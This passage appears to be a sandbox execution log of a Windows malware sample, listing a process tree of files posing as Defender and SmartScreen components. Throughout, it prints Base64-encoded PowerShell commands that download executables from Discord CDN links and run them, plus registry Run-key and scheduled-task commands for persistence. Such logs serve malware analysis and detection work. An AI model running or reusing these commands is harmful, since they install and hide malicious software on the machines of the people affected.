"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADgANQAxADMANQAxADYAOAAyADYANgA5ADQALwBmAGQAcwBmADQAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwBrAHAAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAZgBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAZgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMANAAyAGYAZAAyAC4AZQB4AGUAJwApACkAPAAjAGsAeABhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAZQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHMAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzADQAMgBmAGQAMgAuAGUAeABlACcAKQA8ACMAcABlAG0AIwA+AA=="
8⤵
PID:1304

C:\Users\Admin\AppData\Roaming\342fd2.exe
"C:\Users\Admin\AppData\Roaming\342fd2.exe"
9⤵
PID:5640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:1976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SmartScreenDefender';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SmartScreenDefender' -Value '"C:\Users\Admin\AppData\Roaming\SmartScreenDefender\SmartScreenDefender.exe"' -PropertyType 'String'
11⤵
PID:4204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
11⤵
PID:4244

C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
"C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE"
7⤵
PID:2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANAA3ADMAMQA3ADQAMgAyADkAMAAzADIALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBTAG0AYQByAHQAdABTAGMAcgBlAGUAbgAuAGUAeABlACcALAAgADwAIwBtAHUAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAaAByACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAawBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADQAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAcgBiAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADQAMQBmADIALgBlAHgAZQAnACkAPAAjAHEAZwBjACMAPgA="
8⤵
PID:416

C:\Users\Admin\AppData\Roaming\ab541f2.exe
"C:\Users\Admin\AppData\Roaming\ab541f2.exe"
9⤵
PID:6004

C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE"
7⤵
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANQA2ADkANQA4ADAAMwAxADAANQA5ADkALwBkAGwAcABjAGQAaQBsAGQAbwBtAC4AZQB4AGUAJwAsACAAPAAjAGUAdABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBxAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBzAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBiAG0AYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAHAAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB4AGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMgAxAGYAMgAuAGUAeABlACcAKQA8ACMAawBrAHIAIwA+AA=="
8⤵
PID:3932

C:\Users\Admin\AppData\Roaming\ab521f2.exe
"C:\Users\Admin\AppData\Roaming\ab521f2.exe"
9⤵
PID:5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5152

C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE"
7⤵
PID:2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMQA0ADIAOQA3ADcANgA2ADMAMAAyADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHQAZABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBlAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABhAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADgAMgAuAGUAeABlACcAKQApADwAIwBoAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHQAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbQBiAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADgAMgAuAGUAeABlACcAKQA8ACMAeQB5AGsAIwA+AA=="
8⤵
PID:5000

C:\Users\Admin\AppData\Roaming\ab82.exe
"C:\Users\Admin\AppData\Roaming\ab82.exe"
9⤵
PID:6136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5960

C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE"
7⤵
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADgAMAA3ADMAMQA0ADAAMAA1ADYAMQAzADUALwBwAGwAZABlAGkAZQBtAHAAbABpAC4AZQB4AGUAJwAsACAAPAAjAHcAdQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABnAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBxAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwBkADIAMwA0ADIALgBlAHgAZQAnACkAKQA8ACMAagByAHUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBjAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZAAyADMANAAyAC4AZQB4AGUAJwApADwAIwB4AHcAcwAjAD4A"
8⤵
PID:3236

C:\Users\Admin\AppData\Roaming\ab53d2342.exe
"C:\Users\Admin\AppData\Roaming\ab53d2342.exe"
9⤵
PID:696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:1344

C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE"
7⤵
PID:4752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANAAzADgAMwA1ADMAMQAyADEAMwA0ADEALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBTAG0AYQByAHQAdABTAGMAcgBlAGUAbgAuAGUAeABlACcALAAgADwAIwB2AHAAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAeAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAZABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADQAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbgByAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABrAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADQAMQBmADIALgBlAHgAZQAnACkAPAAjAG0AbABtACMAPgA="
8⤵
PID:1672

C:\Users\Admin\AppData\Roaming\ab241f2.exe
"C:\Users\Admin\AppData\Roaming\ab241f2.exe"
9⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 732
10⤵
- Program crash
PID:5780

C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE"
7⤵
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAOAA4ADkAOAAzADIAMQA5ADQAMAA4ADkALwBXAGkAbgBkAG8AdwBzAFMAZQBpAHMAcwBvAG4ATQBhAG4AYQBnAGUALgBlAHgAZQAnACwAIAA8ACMAZwB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAHMAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGQAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGIANQAzADEAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBmAG0AagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGgAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBhAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwAxADIAMQBmADIALgBlAHgAZQAnACkAPAAjAGMAZABtACMAPgA="
8⤵
PID:2304

C:\Users\Admin\AppData\Roaming\ab53121f2.exe
"C:\Users\Admin\AppData\Roaming\ab53121f2.exe"
9⤵
PID:6000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:4984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
11⤵
PID:2244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsSeissonManage';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsSeissonManage' -Value '"C:\Users\Admin\AppData\Roaming\WindowsSeissonManage\WindowsSeissonManage.exe"' -PropertyType 'String'
11⤵
PID:1896

C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE"
7⤵
PID:4504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcANQA5ADUANgA4ADkAOAA1ADIAOQA4ADkALwBEAGUAZgBlAG4AZABlAHIAUAByAG8AdABlAGMAdAAuAGUAeABlACcALAAgADwAIwBxAHcAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAdwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAawB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAMgAxAGYAMgAuAGUAeABlACcAKQApADwAIwBqAGwAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHAAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABmAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADUAMwAyADEAZgAyAC4AZQB4AGUAJwApADwAIwB4AHYAeQAjAD4A"
8⤵
PID:188

C:\Users\Admin\AppData\Roaming\ab5321f2.exe
"C:\Users\Admin\AppData\Roaming\ab5321f2.exe"
9⤵
PID:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderProtect';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderProtect' -Value '"C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe"' -PropertyType 'String'
10⤵
PID:5388

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \DefenderProtect /tr "C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:5844

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \DefenderProtect /tr "C:\Users\Admin\AppData\Roaming\DefenderProtect\DefenderProtect.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:5292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:4240

C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE"
7⤵
PID:2572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMgA4ADYANAAwADEAOAA2ADcANwA5ADYALwBsAGMAbwBtAHAAbABjAG0AcABvAC4AZQB4AGUAJwAsACAAPAAjAG4AeABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwB4AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBqAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBiADIAOABmADIALgBlAHgAZQAnACkAKQA8ACMAcgBnAGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABuAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAbABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAZgAyAC4AZQB4AGUAJwApADwAIwBhAHMAdgAjAD4A"
8⤵
PID:8

C:\Users\Admin\AppData\Roaming\ab28f2.exe
"C:\Users\Admin\AppData\Roaming\ab28f2.exe"
9⤵
PID:5252

C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE"
7⤵
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMQA5ADkANwAwADkAOAAwADIANgAwADgALwBDAFIALgBlAHgAZQAnACwAIAA8ACMAawBnAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AHIAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAG0AZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGIAOABmADIALgBlAHgAZQAnACkAKQA8ACMAZABwAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBnAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZgBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA4AGYAMgAuAGUAeABlACcAKQA8ACMAZQBrAGgAIwA+AA=="
8⤵
PID:4696

C:\Users\Admin\AppData\Roaming\ab8f2.exe
"C:\Users\Admin\AppData\Roaming\ab8f2.exe"
9⤵
PID:3144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
10⤵
PID:4552

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:5320

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:5144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:6104

C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE"
7⤵
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAMwA0ADEANgA0ADUAMAA1ADQAMAA1ADIALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcALAAgADwAIwBtAGEAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdABoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAegBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbABjAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQB6AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAdQB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgAyADgAMQBmADIALgBlAHgAZQAnACkAPAAjAHEAbAB5ACMAPgA="
8⤵
PID:5036

C:\Users\Admin\AppData\Roaming\ab281f2.exe
"C:\Users\Admin\AppData\Roaming\ab281f2.exe"
9⤵
PID:6080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
10⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:5752

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:5760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:3876

C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE"
7⤵
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
